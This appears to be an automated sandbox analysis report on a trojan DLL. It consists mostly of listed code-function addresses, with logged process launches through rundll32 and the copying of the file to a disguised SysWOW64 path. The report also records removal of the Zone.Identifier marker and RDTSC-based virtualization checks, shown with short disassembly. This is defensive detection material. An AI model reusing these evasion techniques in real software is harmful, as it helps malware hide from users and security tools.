Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF9E22	9_2_00AF9E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B11A3C	9_2_00B11A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0F83F	9_2_00B0F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B05220	9_2_00B05220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B01C10	9_2_00B01C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF1A0A	9_2_00AF1A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF220A	9_2_00AF220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF8C09	9_2_00AF8C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF4C00	9_2_00AF4C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AFF41F	9_2_00AFF41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AFE21C	9_2_00AFE21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF1C76	9_2_00AF1C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0406E	9_2_00B0406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AFA048	9_2_00AFA048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF2A46	9_2_00AF2A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF3845	9_2_00AF3845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF2043	9_2_00AF2043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0E441	9_2_00B0E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF9A57	9_2_00AF9A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF2654	9_2_00AF2654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B07BB2	9_2_00B07BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0B1B5	9_2_00B0B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B09DA1	9_2_00B09DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B02FA2	9_2_00B02FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AFBFB6	9_2_00AFBFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B04BAA	9_2_00B04BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF758F	9_2_00AF758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF4F8E	9_2_00AF4F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B11193	9_2_00B11193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0B397	9_2_00B0B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0D99A	9_2_00B0D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF9384	9_2_00AF9384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B04D8D	9_2_00B04D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AFFD91	9_2_00AFFD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B103F1	9_2_00B103F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF55E8	9_2_00AF55E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AFC5FE	9_2_00AFC5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0BFE8	9_2_00B0BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF6FC4	9_2_00AF6FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AFA3DF	9_2_00AFA3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B125C3	9_2_00B125C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B10B34	9_2_00B10B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF6B25	9_2_00AF6B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF5923	9_2_00AF5923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B1292B	9_2_00B1292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0FD10	9_2_00B0FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF2309	9_2_00AF2309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF3502	9_2_00AF3502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF251C	9_2_00AF251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0577E	9_2_00B0577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0056A	9_2_00B0056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B01F6B	9_2_00B01F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF3345	9_2_00AF3345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B11343	9_2_00B11343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF3F5C	9_2_00AF3F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AFC158	9_2_00AFC158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00B0F14D	9_2_00B0F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAECE3	16_2_00EAECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EADEF4	16_2_00EADEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E930F6	16_2_00E930F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB08D1	16_2_00EB08D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA7ED1	16_2_00EA7ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA44AA	16_2_00EA44AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA78A5	16_2_00EA78A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E95AB2	16_2_00E95AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA748A	16_2_00EA748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9AC95	16_2_00E9AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E92043	16_2_00E92043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E93845	16_2_00E93845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA5220	16_2_00EA5220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9EC27	16_2_00E9EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAF83F	16_2_00EAF83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9220A	16_2_00E9220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9441E	16_2_00E9441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E955E8	16_2_00E955E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9C5FE	16_2_00E9C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA4BAA	16_2_00EA4BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA2FA2	16_2_00EA2FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9758F	16_2_00E9758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E99384	16_2_00E99384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB0B34	16_2_00EB0B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAAEEB	16_2_00EAAEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAA8F0	16_2_00EAA8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EABEC9	16_2_00EABEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA0ADE	16_2_00EA0ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EACCD4	16_2_00EACCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EACAA8	16_2_00EACAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9DAAE	16_2_00E9DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9FEA0	16_2_00E9FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAD6A7	16_2_00EAD6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA90BA	16_2_00EA90BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA98BD	16_2_00EA98BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA4E8A	16_2_00EA4E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9CC8D	16_2_00E9CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E97283	16_2_00E97283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB0687	16_2_00EB0687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAAC9B	16_2_00EAAC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E93C91	16_2_00E93C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAD091	16_2_00EAD091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA406E	16_2_00EA406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E91C76	16_2_00E91C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9A048	16_2_00E9A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAE441	16_2_00EAE441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E92A46	16_2_00E92A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E92654	16_2_00E92654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E99A57	16_2_00E99A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9D223	16_2_00E9D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E99E22	16_2_00E99E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB1A3C	16_2_00EB1A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E98C09	16_2_00E98C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E91A0A	16_2_00E91A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E94C00	16_2_00E94C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9E21C	16_2_00E9E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9F41F	16_2_00E9F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA1C10	16_2_00EA1C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EABFE8	16_2_00EABFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB03F1	16_2_00EB03F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB25C3	16_2_00EB25C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E96FC4	16_2_00E96FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9A3DF	16_2_00E9A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA9DA1	16_2_00EA9DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA7BB2	16_2_00EA7BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA43B3	16_2_00EA43B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAB1B5	16_2_00EAB1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9BFB6	16_2_00E9BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA4D8D	16_2_00EA4D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E94F8E	16_2_00E94F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAD99A	16_2_00EAD99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9FD91	16_2_00E9FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB1193	16_2_00EB1193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAB397	16_2_00EAB397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA056A	16_2_00EA056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA1F6B	16_2_00EA1F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA577E	16_2_00EA577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAF14D	16_2_00EAF14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB1343	16_2_00EB1343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E93345	16_2_00E93345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9C158	16_2_00E9C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E93F5C	16_2_00E93F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EB292B	16_2_00EB292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E95923	16_2_00E95923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E96B25	16_2_00E96B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E92309	16_2_00E92309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E93502	16_2_00E93502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E9251C	16_2_00E9251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EAFD10	16_2_00EAFD10

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6F195BE0 appears 43 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6F195BE0 appears 46 times

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F1813F0 zwxnlwalmcbgmt,		1_2_6F1813F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F1813F0 zwxnlwalmcbgmt,		3_2_6F1813F0

Source: 5YO8hZg21O.dll

Binary or memory string: OriginalFilenameErulfuaekg.dll6 vs 5YO8hZg21O.dll

Source: 5YO8hZg21O.dll

Virustotal: Detection: 21%

Source: 5YO8hZg21O.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,Control_RunDLL
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,abziuleoxsborpb
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,aejkroaebsbxdnkhb
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kcjcdjrdnmqurw\wsxegqzrq.heo",xBPZ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kcjcdjrdnmqurw\wsxegqzrq.heo",Control_RunDLL
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,abziuleoxsborpb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,aejkroaebsbxdnkhb	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Kcjcdjrdnmqurw\wsxegqzrq.heo",xBPZ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\5YO8hZg21O.dll",Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Kcjcdjrdnmqurw\wsxegqzrq.heo",Control_RunDLL	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winDLL@29/5@0/22

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F18BC70 SHGetFolderPathW,CoCreateInstance,

1_2_6F18BC70

Source: C:\Windows\SysWOW64\rundll32.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 16_2_00EA1B54 CreateToolhelp32Snapshot,

16_2_00EA1B54

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\5YO8hZg21O.dll,Control_RunDLL

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F18EBD0 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

1_2_6F18EBD0

Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK
Source: C:\Windows\SysWOW64\rundll32.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: 5YO8hZg21O.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: 5YO8hZg21O.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 5YO8hZg21O.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 5YO8hZg21O.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 5YO8hZg21O.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 5YO8hZg21O.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00C91229 push eax; retf	1_2_00C9129A
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_00CA6134 push edi; retf 0040h	1_2_00CA6135
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F195C26 push ecx; ret	1_2_6F195C39
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F1B8067 push ecx; ret	1_2_6F1B807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03121229 push eax; retf	3_2_0312129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F195C26 push ecx; ret	3_2_6F195C39
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F1B8067 push ecx; ret	3_2_6F1B807A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_03311229 push eax; retf	5_2_0331129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_00AF1229 push eax; retf	9_2_00AF129A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00E91229 push eax; retf	16_2_00E9129A

Source: 5YO8hZg21O.dll

Static PE information: real checksum: 0x81586 should be: 0x78a30

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Kcjcdjrdnmqurw\wsxegqzrq.heo

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

File opened: C:\Windows\SysWOW64\Kcjcdjrdnmqurw\wsxegqzrq.heo:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_6F197C47 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_6F197C47

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006F186672 second address: 000000006F1866A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F29A4A2E451h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 000000006F188A23 second address: 000000006F188A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007F29A4A2E74Eh 0x00000007 rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006F186672 second address: 000000006F1866A0 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-18h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F29A4A2E451h 0x0000000a mov edi, 0C2869DAh 0x0000000f rdtscp
Source: C:\Windows\System32\loaddll32.exe	RDTSC instruction interceptor: First address: 000000006F188A23 second address: 000000006F188A36 instructions: 0x00000000 rdtscp 0x00000003 test edx, edx 0x00000005 jnbe 00007F29A4A2E74Eh 0x00000007 rdtscp

Source: C:\Windows\System32\svchost.exe TID: 2680	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2696	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5416	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6F186620 rdtscp

1_2_6F186620

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6F1AD1EE FindFirstFileExA,	1_2_6F1AD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6F1AD1EE FindFirstFileExA,	3_2_6F1AD1EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 16_2_00EA1A80 FindFirstFileW,	16_2_00EA1A80

Source: C:\Windows\SysWOW64\rundll32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

